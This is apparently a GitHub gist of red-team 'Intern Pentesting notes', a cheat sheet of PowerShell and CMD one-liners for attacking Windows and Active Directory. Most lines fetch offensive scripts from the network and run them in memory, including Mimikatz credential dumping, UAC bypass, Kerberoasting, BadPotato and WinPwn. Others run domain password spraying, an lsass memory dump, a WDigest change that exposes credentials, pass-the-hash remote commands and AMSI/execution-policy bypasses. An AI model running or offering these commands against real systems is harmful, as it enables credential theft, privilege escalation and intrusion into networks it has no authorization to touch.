Last active
November 2, 2025 20:37
-
-
Save moscowchill/cb9733f3aaf666d7db94e69dcd8b1e44 to your computer and use it in GitHub Desktop.
Intern Pentesting notes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [+] Collection of PowerShell and CMD one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # ======================================== | |
| # POWERSHELL LOADERS (Run from CMD) | |
| # ======================================== | |
| #Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| #Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| #Import Mimikatz Module to run further commands | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')" | |
| #PowerUp: Privilege escalation checks | |
| powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks" | |
| #Invoke-Inveigh and log output to file | |
| powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y" | |
| #Invoke-Kerberoast and provide Hashcat compatible hashes | |
| powershell.exe -exec Bypass -C "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt" | |
| #Invoke-ShareFinder and print output to file | |
| powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" | |
| #Import PowerView Module to run further commands | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')" | |
| #Invoke-Bloodhound dconly because speed | |
| powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/puckiestyle/powershell/master/SharpHound.ps1');Invoke-BloodHound -CollectionMethod DCOnly" | |
| #WinPEAS - Download latest release and execute from memory, output to file | |
| powershell.exe -exec Bypass -C "$url='https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe';$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest $url -UseBasicParsing | Select-Object -ExpandProperty Content));[winPEAS.Program]::Main('nocolor log=winpeas.txt')" | |
| #WinPEAS - Download latest release and execute from memory with custom parameters | |
| powershell.exe -exec Bypass -C "$url='https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe';$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest $url -UseBasicParsing | Select-Object -ExpandProperty Content));[winPEAS.Program]::Main('other-flags-first log=output.txt')" | |
| #WinPEAS - Download to disk and execute (noisy) | |
| powershell.exe -exec Bypass -C "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe','winPEASany_ofs.exe');.\winPEASany_ofs.exe log=winpeas.txt" | |
| # ======================================== | |
| # POWERSHELL LOADERS (Run from PowerShell) | |
| # ======================================== | |
| #Windows-Security-Checks | |
| IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/moscowchill/Windows-Security-Checks/refs/heads/main/check.ps1') | |
| #Registry and Startup Enumeration Script | |
| IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/moscowchill/Windows-Security-Checks/refs/heads/main/Registry-Startup-Check.ps1') | |
| #PowerView Example - Export domain user emails | |
| IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1'); Get-DomainUser | Select-Object samaccountname, emailaddress | Export-Csv -Path "H:\Desktop\UserEmails.csv" -NoTypeInformation | |
| #Run Rubeus and run triage command | |
| IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1'); Invoke-Rubeus triage | |
| #BadPotato exploit which requires impersonate privs | |
| iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/IAMinZoho/OFFSEC-PowerShell/main/Invoke-BadPotato.ps1')); Invoke-BadPotato | |
| #Watson nextgen rastamouse exploit suggestor | |
| iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/IAMinZoho/OFFSEC-PowerShell/main/Invoke-SharpWatson.ps1')); Invoke-watson | |
| #Domain password spraying | |
| iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/moscowchill/DomainPasswordSpray/master/DomainPasswordSpray.ps1')); Invoke-DomainPasswordSpray -Password Zomer2023! | |
| # or | |
| IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/moscowchill/DomainPasswordSpray/master/DomainPasswordSpray.ps1'); Invoke-DomainPasswordSpray -Password Zomer2023! | |
| #WinPwn all kinds of windows exploitation tools | |
| iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1'); winpwn | |
| #ADCSPwn | |
| iex(new-object net.webclient).downloadstring('needs new powsh loader!'); Invoke-ADCSPwn | |
| #Amnesiac - post-exploitation framework for lateral movement within AD environments | |
| iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Amnesiac/main/Amnesiac.ps1');Amnesiac | |
| #WinPEAS - Download latest release and execute from memory, output to file | |
| $url='https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe';$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest $url -UseBasicParsing | Select-Object -ExpandProperty Content));[winPEAS.Program]::Main('nocolor log=winpeas.txt') | |
| #WinPEAS - Download latest release and execute from memory (with custom parameters) | |
| $url='https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe' | |
| $wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest $url -UseBasicParsing | Select-Object -ExpandProperty Content)) | |
| [winPEAS.Program]::Main('other-flags-first log=output.txt') | |
| #WinPEAS - Download to disk and execute (noisy) | |
| $wc=New-Object System.Net.WebClient | |
| $wc.DownloadFile('https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe','winPEASany_ofs.exe') | |
| .\winPEASany_ofs.exe nocolor log=winpeas.txt | |
| # ======================================== | |
| # CMD COMMANDS | |
| # ======================================== | |
| #Find GPP Passwords in SYSVOL (CMD version) | |
| findstr /S cpassword %logonserver%\sysvol\*.xml | |
| #Run Powershell prompt as a different user, without loading profile [replace DOMAIN and USER] | |
| runas /user:DOMAIN\USER /noprofile powershell.exe | |
| #Insert reg key to enable Wdigest on newer versions of Windows | |
| reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1 | |
| #Enable RDP | |
| reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f | |
| #Disable RDP | |
| reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f | |
| #Disable Restricted Admin Mode for RDP | |
| reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f | |
| #Enable Restricted Admin Mode for RDP | |
| reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 1 /f | |
| #Disable Restricted Admin Mode for RDP via NetExec | |
| nxc smb <machine> -u <user> -H <hash> -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f' | |
| #Enable Restricted Admin Mode for RDP via NetExec | |
| nxc smb <machine> -u <user> -H <hash> -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x1 /f' | |
| #Manual Procdump for offline mimikatz | |
| .\procdump.exe -accepteula -ma lsass.exe lsass.dmp | |
| #Check always install elevated | |
| reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer | |
| reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer | |
| #Check user privileges | |
| net user /domain ticketsamname | |
| # ======================================== | |
| # POWERSHELL COMMANDS (Direct) | |
| # ======================================== | |
| #Find GPP Passwords in SYSVOL (PowerShell version) | |
| findstr /S cpassword $env:logonserver\sysvol\*.xml | |
| # ======================================== | |
| # NOTES | |
| # ======================================== | |
| # IF PowerShell is restricted with exec policy or SSL issues add: | |
| Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex etc etc | |
| #Nimplant example powershell usage | |
| powershell BYPASSAMSI=0 BLOCKETW=0 "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/moscowchill/Windows-Security-Checks/refs/heads/main/Registry-Startup-Check.ps1')" | |
| #It will fuck the output with emojis or ansi or other bullshit looks hacky but works | |
| powershell BYPASSAMSI=0 BLOCKETW=0 "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/moscowchill/Windows-Security-Checks/refs/heads/main/Registry-Startup-Check.ps1')| Out-File -FilePath ".\Registry-Startup-Check-Results.txt"" | |
| # | |
| powershell BYPASSAMSI=1 BLOCKETW=0 "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/moscowchill/Windows-Security-Checks/refs/heads/main/check.ps1')| Out-File -FilePath ".\check.txt"" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment